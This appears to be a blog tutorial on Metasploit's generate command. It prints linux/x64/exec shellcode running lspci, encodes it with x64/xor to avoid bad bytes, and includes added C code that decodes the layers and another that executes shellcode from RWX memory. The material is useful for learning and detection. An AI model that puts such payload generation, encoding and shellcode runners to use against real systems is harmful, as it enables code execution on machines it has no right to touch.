[METASPLOIT] Generating a payload with Metasploit's generate command (generate shellcode on metasploit)

Author 하훌 (hahwul)
Date and Time 10/14/2015
License Creative Commons License


msfconsole can show the shell used in an attack as code rather than only as a file: that is the generate command. It prints the payload's shellcode on screen so you can read it, copy it and paste it into your own code, which makes it a very handy feature.


Select the payload, then print its shellcode with the generate command


hahwul #> use payload/linux/x64/exec
hahwul payload(exec) #>
hahwul payload(exec) #>
hahwul payload(exec) #> show options

Module options (payload/linux/x64/exec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD                    yes       The command string to execute

Checking the generate options
hahwul payload(exec) #> generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war
    -x <opt>  The executable template to use

Set CMD to lspci, then view the shellcode with generate
hahwul payload(exec) #> set CMD lspci
CMD => lspci
hahwul payload(exec) #> generate
# linux/x64/exec - 45 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00" +
"\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8" +
"\x06\x00\x00\x00\x6c\x73\x70\x63\x69\x00\x56\x57\x48\x89" +
"\xe6\x0f\x05"
hahwul payload(exec) #>

Finer control of the generated shellcode with options

The -b option lists the bytes the output must not contain (bad characters). If you exclude \x00, for example, msf picks an encoder that can avoid it (x64/xor here, as the Encoder: line in the header shows) and the output below contains no \x00 byte, which is what you need when the payload has to survive a C string copy.

hahwul payload(exec) #> generate -b '\x00'
# linux/x64/exec - 87 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef" +
"\xff\xff\xff\x48\xbb\xc2\x4b\xf7\xf3\x14\x43\x3d\x2c\x48" +
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa8\x70\xaf" +
"\x6a\x5c\xf8\x12\x4e\xab\x25\xd8\x80\x7c\x43\x6e\x64\x4b" +
"\xac\x9f\xde\x77\x43\x3d\x64\x4b\xad\xa5\x1b\x12\x43\x3d" +
"\x2c\xae\x38\x87\x90\x7d\x43\x6b\x7b\x8a\xc2\x11\xfc\x11" +
"\x43\x3d\x2c"
hahwul payload(exec) #>

The -e option lets you pick the encoder yourself. x86/shikata_ga_nai is the usual choice, but it only targets x86 and the payload above is 64-bit, so we use the simple x64/xor encoder instead. Note that -e on its own only selects the encoder: without -b there is no bad-character list, so nothing stops the chosen key from producing the very bytes you wanted to avoid.

hahwul payload(exec) #> generate -e x64/xor
# linux/x64/exec - 87 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef" +
"\xff\xff\xff\x48\xbb\x94\x05\xbe\x56\x5a\x0d\x93\xa2\x48" +
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xfe\x3e\xe6" +
"\xcf\x12\xb6\xbc\xc0\xfd\x6b\x91\x25\x32\x0d\xc0\xea\x1d" +
"\xe2\xd6\x7b\x39\x0d\x93\xea\x1d\xe3\xec\xbe\x5c\x0d\x93" +
"\xa2\xf8\x76\xce\x35\x33\x0d\xc5\xf5\xdc\x8c\x58\x59\x5f" +
"\x0d\x93\xa2"
hahwul payload(exec) #>

The -f option writes the output to a file instead of stdout. Look at the size, though: 701 bytes were written, not 87, because the default output type is ruby, so the file holds the text listing shown above rather than raw bytes. Add -t raw when you want the binary itself.
hahwul payload(exec) #> generate -b '\x00' -e x64/xor -f ./test.shell
[*] Writing 701 bytes to ./test.shell...
hahwul payload(exec) #>

The -i option runs the encoder several times. Each pass wraps the previous output, decoder stub included, in another layer, so the size grows (87 bytes for one pass, 207 for four) while the outermost stub is still plain, unencoded code: stacking iterations of the same encoder adds bulk, not much evasion against anything that matches the stub itself.

hahwul payload(exec) #> generate -b '\x00' -i 4
# linux/x64/exec - 207 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x48\x31\xc9\x48\x81\xe9\xeb\xff\xff\xff\x48\x8d\x05\xef" +
"\xff\xff\xff\x48\xbb\xfe\x1e\x65\x70\xde\x25\xc7\x50\x48" +
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb6\x2f\xac" +
"\x38\x5f\xcc\x37\xaf\x01\xe1\x2d\xfd\xdb\xca\x38\xaf\x01" +
"\x56\xde\xb2\x2f\xd9\xb1\xb8\x0a\xef\xec\x38\xef\x7d\xe0" +
"\x18\xd3\xe6\x9a\x8f\x21\xc7\x33\xda\x3e\x2b\x5b\x19\xc3" +
"\x21\xb1\x6d\xf0\xaa\x9e\x9d\xc5\x2b\xb1\x6d\x47\x59\x3b" +
"\x2c\x66\x87\xab\xda\x69\xe9\x5b\xa9\x72\xf3\x06\xbf\xf7" +
"\x1d\xec\x67\xc8\x20\x2e\x17\x8a\xf9\x77\x39\xb6\x20\x99" +
"\xd9\x0b\x3c\xf3\x3f\xb3\x20\x99\x6e\xf8\x23\xc4\x49\xae" +
"\x3d\xe8\x40\x3f\xf9\xc7\x88\x6b\x97\x4b\xde\xbc\x4e\x09" +
"\x32\xb8\x27\x6f\xe7\x38\x1b\xc3\x99\x52\x24\x3a\x90\xd2" +
"\x3b\x78\xe5\x78\xc4\xb3\xd7\x8c\x30\x78\xb6\x78\xc4\xb2" +
"\xed\x49\x55\x78\xb6\x30\x21\x27\xcf\xc2\x3a\x78\xe0\x67" +
"\x05\xdd\x59\xae\x56\x78\xb6\x30\xdf\x4e\x50"

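To see what -b, -e and -i actually did to the bytes, here is an added example (my code, not part of the original post and not Metasploit's) that strips the x64/xor layers off the page's outputs and checks that the plain 45-byte payload comes back out. It uses the page's own bytes in the form `generate -t c` prints them: the unencoded output and the `-b '\x00' -i 4` output (the single-layer `-b '\x00'` output drops in the same way). The stub layout it parses is my reading of the fixed bytes every encoded output above begins with; the field offsets and the sign convention of the block count are assumptions, and the code confirms them by decoding the page's data back to the original.

```c
#include <stdio.h>
#include <string.h>

/* Copied from the page in the form `generate -t c` emits: a C string literal,
 * so the payload length is sizeof(x) - 1 (the compiler appends a NUL). */
static const unsigned char PLAIN[] =   /* generate: 45 bytes, contains NULs */
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8"
"\x06\x00\x00\x00\x6c\x73\x70\x63\x69\x00\x56\x57\x48\x89"
"\xe6\x0f\x05";
static const unsigned char ENC4[] =    /* generate -b '\x00' -i 4: 207 bytes */
"\x48\x31\xc9\x48\x81\xe9\xeb\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xfe\x1e\x65\x70\xde\x25\xc7\x50\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb6\x2f\xac"
"\x38\x5f\xcc\x37\xaf\x01\xe1\x2d\xfd\xdb\xca\x38\xaf\x01"
"\x56\xde\xb2\x2f\xd9\xb1\xb8\x0a\xef\xec\x38\xef\x7d\xe0"
"\x18\xd3\xe6\x9a\x8f\x21\xc7\x33\xda\x3e\x2b\x5b\x19\xc3"
"\x21\xb1\x6d\xf0\xaa\x9e\x9d\xc5\x2b\xb1\x6d\x47\x59\x3b"
"\x2c\x66\x87\xab\xda\x69\xe9\x5b\xa9\x72\xf3\x06\xbf\xf7"
"\x1d\xec\x67\xc8\x20\x2e\x17\x8a\xf9\x77\x39\xb6\x20\x99"
"\xd9\x0b\x3c\xf3\x3f\xb3\x20\x99\x6e\xf8\x23\xc4\x49\xae"
"\x3d\xe8\x40\x3f\xf9\xc7\x88\x6b\x97\x4b\xde\xbc\x4e\x09"
"\x32\xb8\x27\x6f\xe7\x38\x1b\xc3\x99\x52\x24\x3a\x90\xd2"
"\x3b\x78\xe5\x78\xc4\xb3\xd7\x8c\x30\x78\xb6\x78\xc4\xb2"
"\xed\x49\x55\x78\xb6\x30\x21\x27\xcf\xc2\x3a\x78\xe0\x67"
"\x05\xdd\x59\xae\x56\x78\xb6\x30\xdf\x4e\x50";
static const unsigned char NUL_ONLY[] = { 0x00 };   /* the -b '\x00' list */

/* The 39-byte decoder stub x64/xor prepends (annotation mine); only the imm32
 * at offset 6 and the 8-byte key at offset 19 differ between runs. */
#define STUB_LEN 39
#define KEY_SIZE 8
static const unsigned char STUB_HEAD[] = "\x48\x31\xc9\x48\x81\xe9";        /* xor rcx,rcx ; sub rcx,imm32 (= -blocks) */
static const unsigned char STUB_MID[] = "\x48\x8d\x05\xef\xff\xff\xff\x48\xbb"; /* lea rax,[rip-0x11] (= stub) ; mov rbx,key */
static const unsigned char STUB_TAIL[] = "\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"; /* xor [rax+0x27],rbx ; sub rax,-8 ; loop */

/* Block count and key if buf starts with an x64/xor stub, else 0. */
static size_t parse_stub(const unsigned char *buf, size_t len, unsigned char key[KEY_SIZE])
{
    unsigned long long imm;
    if (len < STUB_LEN || memcmp(buf, STUB_HEAD, 6) != 0 ||
        memcmp(buf + 10, STUB_MID, 9) != 0 || memcmp(buf + 27, STUB_TAIL, 12) != 0)
        return 0;
    imm = buf[6] | (unsigned long long)buf[7] << 8 |
          (unsigned long long)buf[8] << 16 | (unsigned long long)buf[9] << 24;
    if (imm < 0x80000000ULL)               /* the stub stores -(block count) */
        return 0;
    memcpy(key, buf + 19, KEY_SIZE);
    return (size_t)(0x100000000ULL - imm); /* two's complement back to +n */
}

/* Decode every layer in place. Returns layers removed, or -1 if a stub claims
 * more body than buf holds; *len becomes the decoded length, padding included. */
int peel(unsigned char *buf, size_t *len)
{
    unsigned char key[KEY_SIZE];
    size_t blocks, body, i;
    int layers = 0;
    while ((blocks = parse_stub(buf, *len, key)) != 0) {
        body = blocks * KEY_SIZE;
        if (STUB_LEN + body > *len)
            return -1;
        for (i = 0; i < body; i++)         /* reads stay ahead of writes */
            buf[i] = buf[STUB_LEN + i] ^ key[i % KEY_SIZE];
        *len = body;
        layers++;
    }
    return layers;
}

/* The check -b applies to its own output: 1 if any listed byte occurs. */
int has_badchars(const unsigned char *buf, size_t len, const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < nbad; i++)
        if (memchr(buf, bad[i], len) != NULL)
            return 1;
    return 0;
}

/* Peel enc and compare with PLAIN: layer count, or -1 unless exactly PLAIN
 * followed by NUL padding comes out. */
int layers_to_plain(const unsigned char *enc, size_t len)
{
    unsigned char work[1024];
    size_t n = len, i;
    int layers;
    if (len > sizeof work)
        return -1;
    memcpy(work, enc, len);
    layers = peel(work, &n);
    if (layers < 0 || n < sizeof(PLAIN) - 1 || memcmp(work, PLAIN, sizeof(PLAIN) - 1) != 0)
        return -1;
    for (i = sizeof(PLAIN) - 1; i < n; i++)
        if (work[i] != 0)
            return -1;
    return layers;
}

int main(void)
{
    printf("generate: %d layer(s), NUL present: %d\n",
           layers_to_plain(PLAIN, sizeof(PLAIN) - 1), has_badchars(PLAIN, sizeof(PLAIN) - 1, NUL_ONLY, 1));
    printf("generate -b '\\x00' -i 4: %d layer(s), NUL present: %d\n",
           layers_to_plain(ENC4, sizeof(ENC4) - 1), has_badchars(ENC4, sizeof(ENC4) - 1, NUL_ONLY, 1));
    return 0;
}
```

Compile with `cc -o peel peel.c` and run it. Four layers come off the 207-byte buffer and the last 48 bytes are the 45-byte payload plus the three NULs the encoder pads each 8-byte block with, which is also why the encoded sizes are 39 + 8n. The detection angle is the same observation in reverse: parse_stub matches the outermost stub of every layered output because that stub is never encoded, so its 27 fixed bytes are a signature that no number of -i passes removes; only the imm32 and the key vary.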
Like msfpayload, generate supports many output formats, so the -t option selects the type (the full list is in the -h output above).
hahwul payload(exec) #> generate -b '\x00' -t python
# linux/x64/exec - 87 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =  ""
buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xc1\x50\xbb\x1a\xa4\x7c\xa3"
buf += "\xab\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\xab\x6b\xe3\x83\xec\xc7\x8c\xc9\xa8\x3e\x94\x69\xcc"
buf += "\x7c\xf0\xe3\x48\xb7\xd3\x37\xc7\x7c\xa3\xe3\x48\xb6"
buf += "\xe9\xf2\xa2\x7c\xa3\xab\xad\x23\xcb\x79\xcd\x7c\xf5"
buf += "\xfc\x89\xd9\x5d\x15\xa1\x7c\xa3\xab"
hahwul payload(exec) #> generate -b '\x00' -t c
/*
 * linux/x64/exec - 87 bytes
 * http://www.metasploit.com
 * Encoder: x64/xor
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false, CMD=lspci
 */
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x9f\x84\x06\xdd\x08\xb0\xb7\x8d\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xf5\xbf\x5e\x44\x40\x0b"
"\x98\xef\xf6\xea\x29\xae\x60\xb0\xe4\xc5\x16\x63\x6e\xf0\x6b"
"\xb0\xb7\xc5\x16\x62\x54\x35\x0e\xb0\xb7\x8d\xf3\xf7\x76\xbe"
"\x61\xb0\xe1\xda\xd7\x0d\xe0\xd2\x0d\xb0\xb7\x8d";
hahwul payload(exec) #>
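To check that the `-t c` output really does what CMD says, here is an added example harness (my code, not from the post and not Metasploit's) that maps the bytes into read-write-execute memory and runs them in a forked child, so the harness itself survives. It uses the page's plain 45-byte payload exactly as `-t c` prints it; the eight-byte exit trailer appended after the payload, the Linux x86-64 target, permission to create an RWX mapping and the presence of /bin/sh are my assumptions.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

/* Page's linux/x64/exec (CMD=lspci) payload in generate -t c form. The literal
 * carries a terminating NUL, hence sizeof(buf) - 1 everywhere below. */
unsigned char buf[] =
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8"
"\x06\x00\x00\x00\x6c\x73\x70\x63\x69\x00\x56\x57\x48\x89"
"\xe6\x0f\x05";

/* My addition, placed right after the payload: push 60 ; pop rax ; push 111 ;
 * pop rdi ; syscall  ->  exit(111). Reached only if execve() fails, so the
 * child reports that instead of running off the end of the buffer. */
static const unsigned char exit_trailer[] = "\x6a\x3c\x58\x6a\x6f\x5f\x0f\x05";

/* Copy code plus trailer into a fresh RWX mapping and run it in a forked child.
 * Returns the child's exit status (whatever /bin/sh returned, or 111 if execve
 * failed), or -1 if mapping/fork/wait failed or the child crashed. */
int run_shellcode(const unsigned char *code, size_t len)
{
    size_t total = len + sizeof(exit_trailer) - 1;
    void (*entry)(void);
    pid_t pid;
    int status = 0, rc = -1;
    void *mem = mmap(NULL, total, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);
    memcpy((unsigned char *)mem + len, exit_trailer, sizeof(exit_trailer) - 1);
    memcpy(&entry, &mem, sizeof entry);    /* data pointer -> function pointer */

    pid = fork();
    if (pid == 0) {
        entry();                           /* execve() replaces the child on success */
        _exit(112);                        /* not reached: the trailer exits first */
    }
    if (pid > 0 && waitpid(pid, &status, 0) == pid && WIFEXITED(status))
        rc = WEXITSTATUS(status);
    munmap(mem, total);
    return rc;
}

int main(void)
{
    int rc = run_shellcode(buf, sizeof(buf) - 1);
    printf("child exit status: %d\n", rc);
    return rc < 0;
}
```

Compile with `cc -o run run.c` and run it: the child becomes `/bin/sh -c lspci` and the parent prints what sh returned (127 if lspci is not installed, 111 if execve itself failed). The encoded `-t c` buffer above drops into the same harness unchanged, because the x64/xor stub patches its own body in place; that is also why the mapping has to be writable as well as executable, and why encoded shellcode dies in a W^X region where the plain payload would still run.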
